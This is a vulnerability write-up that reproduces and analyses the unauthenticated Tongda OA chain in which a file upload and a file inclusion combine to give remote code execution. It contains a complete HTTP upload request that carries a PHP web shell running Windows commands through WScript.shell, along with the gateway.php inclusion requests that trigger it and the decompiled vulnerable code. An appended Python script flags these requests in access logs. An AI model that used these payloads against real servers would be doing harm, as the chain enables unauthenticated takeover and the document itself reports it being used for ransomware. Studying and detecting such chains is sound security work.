Tongda OA file upload and file inclusion vulnerability: reproduction and analysis

0x00 Overview

On 2020-03-17, reports surfaced online that a Tongda OA 0day was being exploited to deploy ransomware; the vendor has released a patch. The 0day chains a file upload vulnerability with a file inclusion vulnerability to achieve RCE, with no authentication required.

0x01 Affected versions

2013, 2013 Enhanced Edition, 2015, 2016, 2017, v11
// Among the patches, only the v11 (2020) patch was seen to fix gateway.php (the file inclusion vulnerability)

0x02 Reproduction

Reproduced on v11.

File inclusion vulnerability:

http://localhost/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../nginx/logs/oa.access.log

File upload vulnerability: the uploaded file is stored outside the webroot, for example:

"D:\MYOA\attach\im\2003\ddd.test.jpg"

Request packet:

POST /ispirit/im/upload.php HTTP/1.1
Host: 127.0.0.1
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 633
Content-Type: multipart/form-data; boundary=ee65cd98fdbee896acd30a7b2552b6b5

--ee65cd98fdbee896acd30a7b2552b6b5
Content-Disposition: form-data; name="P"

x
--ee65cd98fdbee896acd30a7b2552b6b5
Content-Disposition: form-data; name="UPLOAD_MODE"

1
--ee65cd98fdbee896acd30a7b2552b6b5
Content-Disposition: form-data; name="DEST_UID"

1
--ee65cd98fdbee896acd30a7b2552b6b5
Content-Disposition: form-data; name="ATTACHMENT"; filename="test07.jpg"
Content-Type: image/jpeg

<?php
$command = $_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c " . $command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
--ee65cd98fdbee896acd30a7b2552b6b5--

The file inclusion is then used to execute the uploaded PHP code (POST body to gateway.php):

json=%7B%22url%22%3A%22%2Fgeneral%2F..%2F..%2Fattach%2Fim%2F2003%2F1941158481.test07.jpg%22%7D&cmd=whoami

Including it this way also works:

http://127.0.0.1/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../attach/im/2003/1044529275.test09.jpg

// In testing, phpinfo(); could not be executed directly; the PHP code above uses the Windows COM component to bypass disable_functions.

0x03 Fix

Apply the vendor patch.

0x04 Vulnerability analysis

The PHP files are Zend-encoded (PHP 5.4); decode them first.

File upload vulnerability analysis, upload.php:5:

$P = $_POST['P'];
if (isset($P) || $P != '') {
    ob_start();
    include_once 'inc/session.php';
    session_id($P);
    session_start();
    session_write_close();
} else {
    include_once './auth.php';
}

The P parameter must be present, otherwise the request goes through the login check in auth.php; any non-empty value is enough.

$DEST_UID = $_POST['DEST_UID'];
$dataBack = array();
if ($DEST_UID != '' && !td_verify_ids($ids)) {
    $dataBack = array('status' => 0, 'content' => '-ERR ' . _('½ÓÊÕ·½IDÎÞЧ'));
    echo json_encode(data2utf8($dataBack));
    exit;
……
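As an added example (not code from the original post or from Tongda OA), the following detection logic flags, in web-server access logs, the two request patterns described above: a gateway.php request whose url parameter contains directory traversal, and a POST to /ispirit/im/upload.php. The log lines are constructed samples in the common combined-log layout; since POST bodies (where the json-wrapped url travels in the second variant) are not logged, POSTs to gateway.php are only marked for review.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample access-log lines (not from the original post).
SAMPLE_LOG = """\
10.0.0.5 - - [17/Mar/2020:10:01:02 +0800] "GET /ispirit/interface/gateway.php?json={}&url=../../ispirit/../../nginx/logs/oa.access.log HTTP/1.1" 200 512
10.0.0.5 - - [17/Mar/2020:10:01:05 +0800] "POST /ispirit/im/upload.php HTTP/1.1" 200 87
10.0.0.7 - - [17/Mar/2020:10:02:11 +0800] "POST /ispirit/interface/gateway.php HTTP/1.1" 200 310
10.0.0.9 - - [17/Mar/2020:10:03:00 +0800] "GET /general/index.php HTTP/1.1" 200 2048
"""

# ip - user [time] "METHOD target PROTO" status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)


def is_traversal(value: str) -> bool:
    """True if the parameter value walks up the directory tree (handles single/double URL encoding)."""
    decoded = unquote(unquote(value)).replace("\\", "/")
    return "../" in decoded


def classify(line: str):
    """Return a finding label for one access-log line, or None if it looks benign."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    params = parse_qs(query, keep_blank_values=True)
    if path.endswith("/ispirit/interface/gateway.php"):
        if any(is_traversal(v) for v in params.get("url", [])):
            return "gateway-lfi-traversal"
        if m.group("method") == "POST":
            return "gateway-post-review"  # url may be inside the json POST body, which is not logged
    if path.endswith("/ispirit/im/upload.php") and m.group("method") == "POST":
        return "im-upload-post"
    return None


def scan(log_text: str):
    """Return (client ip, label) for every suspicious line in the log text."""
    findings = []
    for line in log_text.splitlines():
        label = classify(line)
        if label:
            findings.append((LINE_RE.match(line).group("ip"), label))
    return findings
```

Correlating an "im-upload-post" followed by a "gateway-lfi-traversal" or "gateway-post-review" from the same client within a short window matches the chain described above.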